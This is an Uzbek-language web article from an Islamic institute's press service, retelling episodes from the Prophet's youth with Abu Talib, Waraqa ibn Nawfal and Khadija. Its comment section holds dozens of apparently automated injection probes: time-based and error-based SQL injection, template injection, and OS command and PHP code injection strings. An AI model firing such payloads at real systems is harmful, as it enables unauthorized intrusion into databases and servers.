30.08.2023

AMAKILARI ABU TOLIBNING TARBIYASIGA O‘TISHLARI

—  Bu so‘zingiz to‘g‘ridur. Siz degandek, bolaning ota-onasi yosh chog‘ida o‘lib ketgandur. Men bo‘lsam ular o‘rnida tarbiyat qilib turgan amakisidurman.
Bu so‘zlarni eshitgan rohibga bu bolaning oxirzamon Payg‘ambarligi aniq bo‘ldi. Tavrot  va Injilda aytilgan sifatlari to‘g‘ri keldi, deb ko‘ngli qanoatlandi. Ziyofat o‘tgandin so‘ngra rohib Abu Tolibni bir chetga chaqirib:
—  Ey Abu Tolib, sizga xushxabar, bu o‘g‘lingiz voyasiga yetsa, Alloh taoloning habibi, anbiyolar sarvari— oxirzamon Payg‘ambari bo‘lur. Tavrot va Injilda sifatlari   yozilmishdur. Uzun yillardin beri savmaada yotib, shuni kutmoqda edim. Alhamdulilloh, bugun maqsadimga yetdim. Shom shahridagi yaxud olimlari ham o‘z kitoblarida bu voqeani ko‘rib, alar ham kutib turmoqdalar. Chunki Alloh taolo tarafidin Payg‘ambarlarga berilgan barcha kitoblarda bu Payg‘ambarning sifatlari bayon qilingandur. Shu jihatdan yahud, nasoro olimlari bu ishdin xabardordurlar.
Endi bundoq ulug‘ darajali payg‘ambarlar alardin bo‘lmay, arab naslidin chiqqanligi uchun, hasadlari qo‘zg‘olib, ko‘ngillarida qattiq adovat saqlamoqdadurlar. Endi maning sizga do‘stlik so‘zim shuki, Shom shahriga kirmasdin, bolani olib, siz bu joydin qayting. Mabodo unga dushmanlar qasd qilib, ziyon zahmatlar yetkuzmasun, — dedi.
Abu Tolib ham bu rohib so‘zini anglab, Shomi sharif ichiga kirmay, karvon tushgan joyda ishlarini bitirib qaytdi. Endi ul joydin karvon yurib, sihat-salomat Makkaga yetdilar.
Shundoq qilib, oradin oy, yillar o‘tib, Payg‘ambarimizning yoshlari yigirmadan oshdi. Payg‘ambarimiz bolalik vaqtidan boshlaboq odoblik, ko‘rkam axloqlik, chin so‘zlik,yumshoq ko‘ngillik, saxovatqo‘llik, go‘zal qilig‘lik, ulug‘ himmatlik edilar. Katta-kichik, yaxshi-yomon, do‘st-dushman barchaga qilgan ishlari yoqimlik edi. O‘yin-kulgudin, botil ishlardin ko‘ngillari nafrat qilur edi. Ul zamondagi arab xalqining tutgan butparastlik dinlaridin va har xil buzuq axloqlaridin bek jirkanur edilar. Bularning tutgan dinlari botil dindur, albatta, xato yo‘l bo‘lg‘ay, deb ishonur edilar.
Birovdin ko‘rmasdin, hech kimsadin o‘rganmasdin Ibrohim Xalilullohning haq dinlarini tutgan edilar. Xudo tarafidin ko‘ngillariga shundoq ilhom bo‘lgan edi.
Avvalda arab xalqining tutgan dinlari Ibrohim alayhissalom kelturgan Islom dini bo‘lsa ham, bu o‘rtada uzun zamonlar o‘tishi bilan ul yo‘ldan adashib, bularda butparastlik ko‘p rivoj topgan edi. Ichlarida Quraysh qabilasidan Varaqa ibn Navfal degan bir olim kishi bo‘lib, butun arablar ichida Ibrohim alayhissalomdin qolgan haq dinni tutgan yolg‘izgina shu kishi edi. Bu kishi ersa, hazrati Xadicha onamizning amakilaridur. Injil kitoblaridin o‘qib ko‘rib, u kishi:
— Oxirzamon Payg‘ambari chiqar chog‘i yaqinlashdi. Shu kunlarda tug‘ilib, soyasi yer ustiga tushdi. Ul arab nasli, Quraysh urug‘idin bo‘lib, butun xalqni haq dinga da’vat qilur. Uning so‘ziga arablar inkor qilib, qarshi chiqqaylar. O‘z qabilasidin unga ko‘p jabru jafolar yetgay, oxirida uni o‘z shahri Makkadin qochishga majbur qilgaylar. Koshki men u zamonda tirik bo‘lsam edim. Afsuski, u zamonni ko‘rishga umr oz qoldi, — deb har qachon shundoq so‘zlar bilan hasrat qilur edilar. Varaqaning shundoq so‘zlarini eshitib yurgan onamiz Xadicha:
«Agar bu ulug‘ davlat arablar ichida birovga nasib bo‘lsa, albatta, Muhammaddan boshqaga bo‘lmasa kerak. Chunki unda har bir yaxshilikning belgilari bordur. O‘shandoq zotning xizmatiga loyiq bo‘lsam, nikohlariga kirsam, men uchun qandoq ulug‘ baxt- davlat bo‘lur edi», deb hamisha orzu qilar edi.

 Imom Faxriddin ar-Roziy islom bilim yurti matbuot xizmati.

Izoh qoldirish

Izohlar

20.09.2023 16:40
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',2)='s
20.09.2023 16:40
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',0)='u
20.09.2023 16:40
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('r',2)
20.09.2023 16:40
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('m',0)
20.09.2023 16:40
123456'and(select+1)>0waitfor/**/delay'0:0:2
20.09.2023 16:40
123456'and(select+1)>0waitfor/**/delay'0:0:0
20.09.2023 16:40
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
20.09.2023 16:40
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
20.09.2023 16:40
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
20.09.2023 16:40
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
20.09.2023 16:40
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
20.09.2023 16:40
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
20.09.2023 16:40
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
20.09.2023 16:39
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
20.09.2023 16:39
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
20.09.2023 16:39
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
20.09.2023 16:39
(select*from(select+sleep(2)union/**/select+1)a)
20.09.2023 16:39
(select*from(select+sleep(0)union/**/select+1)a)
20.09.2023 16:39
123456"and"l"="z
20.09.2023 16:39
123456"and"d"="d
20.09.2023 16:39
123456'and'h'='s
20.09.2023 16:39
123456'and'r'='r
20.09.2023 16:39
123456/**/and+1=9
20.09.2023 16:39
123456/**/and+3=3
20.09.2023 16:39
123456
20.09.2023 16:39
123456
20.09.2023 16:39
123456
20.09.2023 16:39
123456'"\(
20.09.2023 16:39
123456
20.09.2023 16:39
123456鎈'"\(
20.09.2023 16:39
123456
20.09.2023 16:39
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1838463946')))>'0
20.09.2023 16:39
123456
20.09.2023 16:39
123456
20.09.2023 16:39
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1688648205')))
20.09.2023 16:39
123456
20.09.2023 16:39
123456
20.09.2023 16:39
123456/**/and/**/cast(md5('1193391345')as/**/int)>0
20.09.2023 16:39
<%- 886646344+975459075 %>
20.09.2023 16:39
123456
20.09.2023 16:39
123456'and(select'1'from/**/cast(md5(1578228196)as/**/int))>'0
20.09.2023 16:39
#set($c=934819900+860630718)${c}$c
20.09.2023 16:39
${967404471+805231691}
20.09.2023 16:39
expr 856730518 + 951458621
20.09.2023 16:39
123456
20.09.2023 16:39
extractvalue(1,concat(char(126),md5(1026594839)))
20.09.2023 16:39
${(845863112+889383838)?c}
20.09.2023 16:39
123456&set /A 821325866+964268506
20.09.2023 16:39
123456
20.09.2023 16:39
123456$(expr 916500810 + 947834171)
20.09.2023 16:39
123456
20.09.2023 16:39
123456"and/**/extractvalue(1,concat(char(126),md5(1217393444)))and"
20.09.2023 16:39
${882817561+830610866}
20.09.2023 16:38
'-var_dump(md5(532369198))-'
20.09.2023 16:38
123456
20.09.2023 16:38
123456
20.09.2023 16:38
123456'and/**/extractvalue(1,concat(char(126),md5(1984134495)))and'
20.09.2023 16:38
/*1*/{{802094324+907413386}}
20.09.2023 16:38
123456
20.09.2023 16:38
123456|expr 984538246 + 989809742